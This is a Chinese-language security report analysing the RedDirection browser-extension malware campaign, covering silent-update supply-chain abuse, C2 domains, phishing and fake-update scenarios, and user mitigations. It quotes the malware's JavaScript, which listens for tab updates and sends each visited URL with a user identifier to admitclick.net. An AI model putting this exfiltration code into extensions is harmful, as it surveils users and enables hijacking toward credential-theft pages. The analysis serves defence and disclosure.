摘要

本報告提供了對 RedDirection 攻擊的全面技術分析,這是一個影響數百萬用戶的複雜瀏覽器擴充功能惡意軟體攻擊,涵蓋多個平台。該攻擊利用看似合法的瀏覽器擴充功能進行秘密監視、資料外洩和惡意重新導向。其成功關鍵在於利用軟體供應鏈漏洞,特別是透過無聲版本更新將 malicious payload 引入先前受信任的擴充功能。本報告深入探討該惡意軟體使用的技術機制,包括其 browser hijacking 技術、command and control 基礎設施以及攻擊情境,並從近期研究和公開披露中汲取見解。

揭露瀏覽器擴充功能惡意軟體:數百萬用戶的隱藏威脅 | 資訊安全新聞

1. 簡介

瀏覽器擴充功能已成為現代網頁瀏覽體驗的重要組成部分,提供增強的功能和客製化。然而,其對瀏覽器功能的特權存取也使其成為網路攻擊的強大載體。RedDirection 攻擊即是此威脅的例證,展示了 Threat actor 如何利用對熱門擴充功能的信任以及為無縫軟體更新設計的機制,大規模滲透用戶系統 [1]。本報告旨在剖析此攻擊的技術細節,提供其操作方法和軟體供應鏈安全的更廣泛影響的詳細概述。

2. RedDirection 攻擊的技術分析

RedDirection 攻擊以其複雜的 browser hijacking 和資料外洩方法為特徵。其核心惡意功能嵌入於擴充功能的背景 service worker 中,以非法方式利用標準瀏覽器擴充功能 API。

2.1. browser hijacking 機制

主要的 hijacking 機制涉及監控和操作用戶的瀏覽行為。該惡意軟體使用 chrome.tabs.onUpdated.addListener API 來檢測瀏覽器標籤頁更新,通常在用戶導航至新 URL 時觸發。當此事件發生時,惡意程式碼會啟動一系列動作:

  1. URL 捕獲: 捕獲當前活躍標籤頁的 URL。
  2. 資料外洩: 將捕獲的 URL 連同被滲透的用戶的唯一識別碼傳送到遠端 Command and Control (C2) 伺服器
  3. 重新導向指令接收: C2 伺服器回應,可能提供新的重新導向 URL。
  4. 自動重新導向: 若收到重新導向 URL,則用戶的瀏覽器會自動且無聲地被重新導向至指定的惡意目的地。

此程序使攻擊者能夠持續控制用戶的瀏覽 session,無需直接用戶互動即可執行各種惡意活動 [1]。

2.2. 程式碼片段分析

展示 browser hijacking 機制的一個關鍵證據是原始文章 [1] 中識別的 JavaScript 程式碼片段: 

  1. chrome.tabs.onUpdated.addListener(function() {
  2.     var t = o(r().mark((function t(e, o, i) {
  3.         // Malicious code that sends your current URL to remote server
  4.         return r().wrap((function(t) {
  5.             for (;;) switch (t.prev = t.next) {
  6.               case 0:
  7.                 if (!o.url) {
  8.                     t.next = 8;
  9.                     break;
  10.                 }
  11.                 return c = {
  12.                     method: "POST",
  13.                     redirect: "follow"
  14.                 }, t.next = 5, fetch("https://admitclick.net/api?key=565ebded7e63cdfa5fcbe5734bdb4281a85d6f21&uuid=" + a + "&allowempty=1&out=" + encodeURIComponent(o.url) + "&format=txt&r=" + Math.random(), c)

對此程式碼片段的分析揭示了幾個關鍵技術細節:

  • chrome.tabs.onUpdated.addListener 此 API 呼叫是惡意軟體運作的核心,允許其根據標籤頁更新觸發動作。雖然合法擴充功能會出於各種目的使用此 API,但在此被用於秘密監視和重新導向 [6]。
  • fetch("https://admitclick.net/api?..." 這行程式碼明確顯示與 C2 伺服器(識別為 admitclick.net )的通訊。URL 包含參數如 key (可能是 API key 或攻擊識別碼)、 uuid (用戶唯一識別碼)以及 out (正在存取的 URL,經 URL 編碼)。使用 encodeURIComponent(o.url) 確保在傳輸前正確處理 URL 中的特殊字元。
  • method: "POST" 雖然在此片段中資料顯示於 URL 查詢字串中,但指定方法為 POST,通常意味著資料在 HTTP Request body 中傳送。這可能是簡化表示或混淆技術。
  • redirect: "follow" fetch Reauest 中的此選項至關重要。它指示瀏覽器自動遵循 C2 伺服器發出的任何 HTTP 重新導向,從而實現對用戶瀏覽器的無縫且不被察覺的重新導向至惡意網站 [1]。

此程式碼清楚展示了用戶瀏覽資料的外洩以及從 C2 伺服器接收並執行重新導向指令的機制。該攻擊透過版本更新引入此惡意功能(有時在初始合法發布後數年),突顯了瀏覽器擴充功能生態系統中的重大供應鏈漏洞 [1]。

2.3. Command and Control 基礎設施

RedDirection 攻擊利用分散式 C2 基礎設施,每個惡意擴充功能似乎在自己的子域名下運作(例如 admitclick.net click.videocontrolls.com c.undiscord.com )[1]。此策略營造出分散操作的假象,使安全研究人員和平台難以僅透過封鎖清單一網域名來識別和阻止整個網絡。這種分散特性增強了攻擊的韌性和持久性。

2.4. Trojan Horse 機制與攻擊情境

該攻擊以經典 Trojan horse 方式運作。擴充功能提供其廣告宣傳的合法功能(例如色彩選擇、影片速度控制),同時秘密嵌入瀏覽器監視和 hijacking 能力 [1]。這種雙重性質使其能夠繞過初步審查並贏得用戶信任。Malicious payload 透過無聲版本更新傳遞,自動安裝至數百萬用戶,利用對已驗證擴充功能的固有信任以及瀏覽器市場的無縫更新機制 [4]。

文章強調了由 browser hijacking 促成的兩個主要攻擊情境:

  1. 透過假更新安裝惡意軟體: 擴充功能可攔截合法連結(例如 Zoom 會議邀請)並將用戶重新導向至一個令人信服的假頁面,提示進行「關鍵更新」。這可能導致用戶無意中安裝額外的惡意軟體,甚至完全危害系統 [1]。
  2. 透過釣魚竊取認證: 擴充功能可無縫將用戶重新導向至攻擊者伺服器上託管的像素完美敏感網站副本(例如銀行登入頁面)。用戶在不知情的情況下輸入認證,這些認證隨後被攻擊者收集 [1]。

這些情境凸顯了此類 browser hijacking 的嚴重影響,將每次點擊和網站存取轉化為潛在的攻擊載體。

3. 供應鏈漏洞與影響

RedDirection 攻擊清楚暴露了瀏覽器擴充功能市場的軟體供應鏈中的關鍵漏洞。擴充功能能夠長期保持無害,然後透過無聲版本更新變為惡意並自動安裝,繞過了傳統安全檢查。這一現象突顯了主要瀏覽器平台採用的信任模型中的重大缺陷。Google 和 Microsoft 的更新管道旨在提高效率和廣泛分發,卻無意中擴大了惡意軟體的影響範圍,將原本為用戶便利設計的機制變成大規模滲透的工具 [1, 4]。這種情況要求重新評估管理擴充功能更新的安全協議,特別是那些具有「已驗證」狀態或特色展示等信任信號的擴充功能 [1]。

在其他環境中也觀察到類似的供應鏈攻擊,惡意程式碼被注入合法軟體更新中,影響數百萬無意中安裝有漏洞版本的用戶 [2, 3]。2024 年的 XZ-utils 供應鏈攻擊未遂進一步凸顯了開源軟體安全日益加劇的危險,顯示出關鍵基礎設施如何透過看似無害的組件成為攻擊目標 [7]。

4. 緩解措施與用戶行動

雖然強大的安全性最終由平台提供者負責,但用戶在緩解瀏覽器擴充功能惡意軟體相關風險方面也扮演著關鍵角色。原始文章建議用戶若安裝了受影響的擴充功能,應立即採取以下行動 [1]:

  • 移除擴充功能: 立即從瀏覽器(Chrome 和 Edge)中移除所有已識別的惡意擴充功能。
  • 清除瀏覽器資料: 清除所有瀏覽器資料,包括 cookie 和快取資訊,以消除任何儲存的追蹤識別碼或惡意軟體殘餘。
  • 系統惡意軟體掃描: 進行全面的系統範圍惡意軟體掃描,檢測並移除可能由擴充功能引入的任何額外感染。
  • 帳戶監控: 密切監控線上帳戶是否有任何可疑活動,特別是在惡意擴充功能活躍期間存取過的敏感網站(例如銀行、電子郵件)。
  • 擴充功能審查: 定期檢查所有已安裝的擴充功能,尋找異常行為、過多的權限或可疑來源。

這些措施對於立即遏制威脅至關重要。然而,瀏覽器開發者和安全供應商需要採取更主動和系統性的方法,以解決擴充功能生態系統中的根本漏洞。

5. 結論

RedDirection 攻擊是一個鮮明的提醒,顯示網路威脅的不斷演變以及數位領域中保持警覺的關鍵重要性。這個複雜的操作突顯了攻擊者如何日益利用受信任的軟體組件和供應鏈漏洞來實現大規模滲透。技術分析揭示了一個精心策劃的計劃,涉及 browser hijacking 、資料外洩和欺騙性重新導向,這些都由熱門瀏覽器擴充功能市場的無聲更新機制促成。

該攻擊強調了在軟體供應鏈中增強安全措施的迫切需要,包括對擴充功能更新進行更嚴格的審查、改進多態惡意軟體的檢測機制以及提高擴充功能權限和行為的透明度。隨著瀏覽器擴充功能繼續成為線上體驗不可或缺的一部分,確保其完整性和安全性對於保護用戶隱私和資料至關重要。持續研究、安全研究人員與平台提供者的協作努力以及用戶教育對於對抗此類先進且普遍的威脅至關重要。

參考資料

  1. Google and Microsoft Trusted Them. 2.3 Million Users Installed Them. They Were Malware.
  2. Compromised Browser Extensions - Jan 2025 - Pulsedive Blog
  3. Rilide malware: How browser extensions are changing cyberattacks
  4. Tech Note - Malicious browser extensions impacting at least 3.2 million users - GitLab Security Tech Notes
  5. The State of Browser Extension Malware - Zimperium
  6. tabs.onUpdated - Mozilla - MDN Web Docs
  7. 2024 State of the Software Supply Chain Report | 10 Year Look Back
Copyright © 2025 版權所有 翊天科技有限公司